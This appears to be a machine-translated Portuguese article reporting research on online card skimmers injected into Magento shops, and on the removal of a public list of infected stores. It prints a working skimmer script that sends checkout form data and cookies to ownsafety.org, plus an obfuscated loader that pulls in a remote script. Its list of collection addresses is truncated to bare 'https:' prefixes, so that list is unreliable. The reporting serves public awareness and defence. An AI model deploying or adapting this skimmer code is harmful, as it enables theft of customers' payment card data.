O skimming online é uma forma relativamente nova de fraude no cartão de crédito. A essência é clara a partir do nome. Se um skimmer regular é uma sobreposição em um leitor de cartão ATM que despeja uma tira magnética, um skimmer online é um marcador de software em um servidor de loja online que intercepta passivamente os dados de pagamento conforme são inseridos pelo usuário nos campos de texto em um navegador. Até o momento, os cardadores se concentraram principalmente nos servidores de transações em que a criptografia é usada, mas, nesse caso, as informações são removidas mesmo antes da criptografia. Em seguida, as informações sobre cartões de pagamento são vendidas em fóruns clandestinos: geralmente um estranho pode fazer pagamentos usando esses cartões.Os especialistas em segurança da Nightly Secure dizemque o skimming online está rapidamente ganhando popularidade recentemente. Pela primeira vez, a disseminação de tais fraudes foi discutida em 2015 . Em novembro de 2015, da lista de 255.000 lojas online, 3.501 lojas com marcadores JS no servidor foram encontradas. Ao longo do ano, seu número aumentou 69%.Um exemplo de marcador javascript para interceptar dados de pagamento é semelhante a este (neste caso, as informações são enviadas para http://ownsafety.org/opp.php):<script>
function j(e) {
var t = "; " + document.cookie,
o = t.split("; " + e + "=");
return 2 == o.length ? o.pop().split(";").shift() : void 0
}
j("SESSIID") || (document.cookie = "SESSIID=" + (new Date).getTime()), jQuery(function(e) {
e("button").on("click", function() {
var t = "",
o = "post",
n = window.location;
if (new RegExp("onepage|checkout").test(n)) {
for (var c = document.querySelectorAll("input, select, textarea, checkbox"), i = 0; i < c.length; i++) if (c[i].value.length > 0) {
var a = c[i].name;
"" == a && (a = i), t += a + "=" + c[i].value + "&"
}
if (t) {
var l = new RegExp("[0-9]{13,16}"),
u = new XMLHttpRequest;
u.open(o, e("
<div />").html("http://ownsafety.org/opp.php").text(), !0), u.setRequestHeader("Content-type", "application/x-www-form-urlencoded"), u.send(t + "&asd=" + (l.test(t.replace(/s/g, "")) ? 1 : 0) + "&utmp=" + n + "&cookie=" + j("SESSIID")), console.clear()
}
}
})
});
No ano passado, os pesquisadores compilaram uma lista de endereços comumente usados para coleta de dados:1860 https:
390 http:
309 https:
100 https:
70 https:
28 https:
23 https:
22 https:
20 https:
17 https:
10 https:
9 http:
5 https:
1 /js/index.php
1 /js/am/extensions/sitemap_api.php
1 https:
1 https:
1 https:
1 http:
1 http:
Em quase todos os casos, pequenas versões do mesmo código são usadas.Este marcador é bastante difícil de detectar no servidor. O código é baixado do CMS e funciona no navegador. No ano passado, ela trabalhou nos três mil e quinhentos sites mencionados por vários meses, em muitos - seis meses ou mais.Especialistas acreditam que um grande número de servidores infectados indica um alto grau de automação do ataque. Não são algumas crianças que fazem scripts, mas bons profissionais. Provavelmente da Rússia.Para implementar indicadores, são usadas vulnerabilidades no software de lojas online. Primeiro de tudo, é um software vulnerável do Magento Commerce. É através dele que é mais fácil implementar o código CMS, embora, na verdade, esse código possa funcionar em qualquer loja online que não use necessariamente o Magento. Verifique a loja online quanto a vulnerabilidades no site MageReports.com .Embora o problema tenha sido levantado há um ano, no ano passado não desapareceu. Pior ainda, as lojas on-line infectadas se tornaram uma vez e meia mais. Em março de 2016, o número de lojas com skimmers aumentou de 3501 para 4476 e, em setembro de 2016, para 5925.Os funcionários da Nightly Secure publicaram uma lista de todas as lojas infectadas para alertar os clientes - e notificar os administradores dessas lojas sobre a vulnerabilidade. De fato, entre eles havia sites bastante populares, incluindo departamentos de fabricantes de automóveis (Audi ZA), organizações governamentais (NRSC, Malásia), sites de músicos populares (Björk) e organizações sem fins lucrativos (Science Museum, Washington Cathedral).Se um ano atrás, em quase todas as lojas, pequenas modificações do mesmo skimmer online eram usadas, agora os pesquisadores já encontraram 9 variedades separadas do script pertencentes a 3 famílias diferentes ( código de exemplo no Github ).Os invasores tornaram-se mais inteligentes e agora usam ofuscação de código em vários níveis, o que não é tão fácil de analisar. Por exemplo, um script pode ser mascarado assim:
Código de malware real:<script language="javascript">window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]('\x3c\x73\x63\x72'+'\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x69\x70\x2e\x35\x75\x75\x38\x2e\x63\x6f\x6d\x2f\x69\x70\x2f\x69\x70\x5f'+'\x34\x30\x37\x39\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72'+'\x69\x70\x74\x3e');
Os autores também aprimoraram o mecanismo de interceptação de dados de cartões de pagamento. Se antes o malware simplesmente interceptava páginas com uma string checkoutno URL, agora já reconhece os populares plug-ins de pagamento Firecheckout, Onestepcheckout e Paypal.Os especialistas da Nightly Secure tentaram entrar em contato com várias lojas (cerca de 30) e informá-los sobre o skimmer instalado, mas eles não receberam uma resposta da maioria das lojas, enquanto outros mostraram uma indiferença surpreendente. Um disse que este não é problema dele, porque os pagamentos são processados por uma empresa terceirizada. O segundo disse que era apenas um erro de Javascript que não era uma ameaça. O terceiro disse que não pode haver perigo, porque "a loja opera em HTTPS". O autor enviou uma lista de lojas de skimmer ao Google para a lista negra da Navegação segura do Chrome.Uma lista de todas as lojas de skimmer foi publicada originalmente no Github . E aqui a diversão começou. Logo github sem avisoremoveu de seu site a publicação de resultados de pesquisas em lojas on-line .Aparentemente, o Github censurou de acordo com o procedimento padrão, tendo recebido uma solicitação de DMCA de uma das lojas. Obviamente, a loja é desagradável quando encontra vulnerabilidade e conta ao mundo inteiro.Ontem, o autor transferiu os resultados de um estudo de segurança da loja online para a hospedagem do Gitlab . Hoje, uma página nesse endereço retorna o erro 404. Algumas horas atrás, o autor recebeu um email do Gitlab explicando os motivos da remoção. Segundo a administração, a publicação de uma lista de lojas vulneráveis é vista como um “caso flagrante” que não pode ser resolvido. Portanto, a lista foi excluída (UPD: acesso restaurado, O diretor do Gitlab pediu desculpas).Cópia da lista no arquivo da webCopiar para PastebinObserve que a lista de lojas com skimmers online instalados lista 44 domínios na zona .RU.Felizmente, os administradores dessas lojas instalarão prontamente a versão Magento com os patches mais recentes e compensarão as perdas para clientes que tenham cópias de cartões de pagamento vazadas para o mercado negro.